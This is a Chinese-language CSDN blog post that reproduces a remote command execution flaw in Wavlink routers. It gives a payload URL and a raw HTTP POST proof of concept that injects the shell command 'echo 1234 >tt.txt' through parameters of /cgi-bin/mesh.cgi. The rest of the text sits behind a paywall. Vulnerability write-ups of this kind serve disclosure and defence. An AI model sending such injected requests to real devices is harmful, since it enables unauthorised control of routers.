Wavlink路由器远程命令执行漏洞(含批量验证poc)

已于 2024-04-04 20:55:35 修改
阅读量54 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-04 20:55:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137382279
版权
本文详细介绍了Wavlink路由器存在的远程命令执行漏洞,包括漏洞描述、复现步骤、POC验证及修复建议。攻击者能够利用该漏洞执行任意命令,威胁设备安全。
摘要由CSDN通过智能技术生成

0x01漏洞描述

睿因科技Wavlink路由器存在远程命令执行漏洞,通过此漏洞攻击者可执行任意命令,如写入木马文件,远程控制路由器。

0x02漏洞复现

(1)payload利用地址:

/cgi-bin/mesh.cgi?page=upgrade&key=%27;echo+1234+%3Ett.txt'

(2)命令执行POC(/cgi-bin/xxx.txt):

POST /cgi-bin/mesh.cgi?page=upgrade&key=%27;echo+1234+%3Ett.txt' HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

page=night_led&start_hour=;echo+1234+>tt.txt;

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】Wavlink路由器远程命令执行漏洞
失心少年
01-09 587
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!睿因科技Wavlink路由器存在远程命令执行漏洞,通过此漏洞攻击者可执行任意命令,如写入木马文件,远程控制路由器执行id命令,并将执行结果写入到路由器中。
Wavlink路由器远程命令执行漏洞批量验证poc),大牛整理
04-15 280
睿因科技Wavlink路由器存在远程命令执行漏洞,通过此漏洞攻击者可执行任意命令,如写入木马文件,远程控制路由器
解决路由器登录页被维盟智能路由管理系统拦截
热门推荐
知无涯
11-17 1万+
不知道怎么了, 路由器登录页面http://192.168.1.1/页面被维盟智能路由管理系统拦截了 上网一查才知道,我们路由器上层,还有一层路由器管理,而那个路由器的登录页面 也是 http://192.168.1.1/ 这就尴尬了啊 后来在网上查找多方 最终我在家里路由器里看到了路由器的另一个管理页面 一般在路由器的背面有路由器的管理页面地址如 如...
解密蓝牙mesh系列 | 第八篇
物联网布道师
09-06 700
节点从元素接收消息,如果元素包的SEQ值小于或等于上一个有效消息中的SEQ值,则节点会将消息丢弃,因为这则消息可能与中继攻击有关。来自给定元素的消息中的IV索引值必须始终等于或大于该元素的上一个有效消息。因此,已从网络中移除的、包原有NetKey 和AppKey的节点将不再是网络成员,换句话说,上述这些不被授信的节点将从网络当中剔除出去,因此也无法再构成威胁。蓝牙mesh网络的大多数安全特性都有赖于业内标准的加密算法和程序,这在本系列的其他安全性相关文章中也会提及,本文还是着重解释最重要的内容。
BlackHat USA 2022议题解读:蓝牙Mesh中的安全攻击面
Baidu_Secrity的博客
08-19 1576
作者:百度安全-AIoT安全团队 Han Yan,Lewei Qu,Dongxiang Ke蓝牙Mesh是智能家居、工业控制等场景的理想解决方案,相关标准也已得到各大芯片厂商的支持,但其软件实现的安全性却未得到足够的重视。针对这一新兴场景,百度安全研究员于北京时间8月11日上午,在BlackHat USA 2022上分享了《BrokenMesh: New Attack Surfaces of Bl...
智能合约风险:SmartMesh攻击,uint溢出之祸
郑泽洲的博客
05-30 960
SmartMesh的理念 智能合约又双叒叕出事了。这次是SmartMesh。 SmartMesh其理念很好,想网络访问领域的去中心化,将来人们联网,不要路由器和交换机,直接相连,电信运营商都死翘翘,每个人按网络贡献挖矿获得收益,发出网络别人帮忙要给钱 SmartMesh遭受的攻击 具体攻击交易之一 事件描述: d6a09bdb29e1eafa92a30373c44b09e2e2e...
Wavlink路由器远程命令执行漏洞批量验证poc)(1),2024年最新教你一种更清晰的网络安全架构
04-15 267
【代码】Wavlink路由器远程命令执行漏洞批量验证poc)(1),2024年最新教你一种更清晰的网络安全架构。
睿因wn529n2a无线路由器怎么设置上网?
10-01
睿因WN529N2A无线路由器的设置过程对于初次接触此类设备的用户可能会显得有些复杂,但其实只要按照步骤进行,就能轻松完成联网配置。以下是一份详细的设置指南,帮助你了解如何让这款路由器正常工作并连接到互联网。...
wavlink:wavlink办公网站,网址为thinkphp5.1.39
03-27
官方网站采用thinkPHP为框架,严格遵守PSR-2 \ PSR-3等规范,代码严谨,几乎捕捉到所有的异常信息,对用户输入采用严格验证,二次扣扩展灵活,采用低扩展开发模式。本系统对睿因科技有限公司提供终身服务,本程序...
睿因(Wavlink) WL-WN575A3 固件 -A-RPTA3-75W.M4300.01.GD.2017Nov22
10-15
睿因(Wavlink)WL-WN575A3是一款高性能的无线路由器,这款设备的固件更新是保持其高效稳定运行的关键。固件,全称为"Firmware",是嵌入在硬件设备中的软件部分,它控制着设备的各项功能,包括网络连接、安全设置、...
RTL8197xD_V2.5_pkg:为 A2004NS 和 Wavlink_WL-WN527A2 路由器编译 OpenWRT 固件-开源
06-06
A2004NS、A2004NSv4 和 Wavlink_WL-WN527A2 无线双频千兆 AC 路由器,具有强大的硬件,但未得到 OpenWRT 社区的官方支持。 并非所有路由器用户都可以自行从源代码编译 OpenWRT 固件。 该项目旨在将这个缺失的 ...
K2 中继 5G WiFi 最稳的固件Wavlink固件
11-01
K2 中继 5G WiFi 最稳的固件(Wavlink固件
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 892
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
【网络安全】本地文件包远程文件包漏洞详解
goldfish8848的博客
08-05 898
开发人员将需要重复调用的函数写入一个文件,对该文件进行包时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1167
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 215
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
lurenjia404的博客
08-07 709
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
wavlink 路由器 live_api 远程命令执行漏洞
01-01
wavlink路由器live_api存在远程命令执行漏洞。该漏洞允许攻击者通过远程发送恶意请求的方式来执行任意命令,从而获取敏感信息或者对系统造成破坏。攻击者可利用此漏洞进行网络入侵、窃取数据或者进行其他恶意活动。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值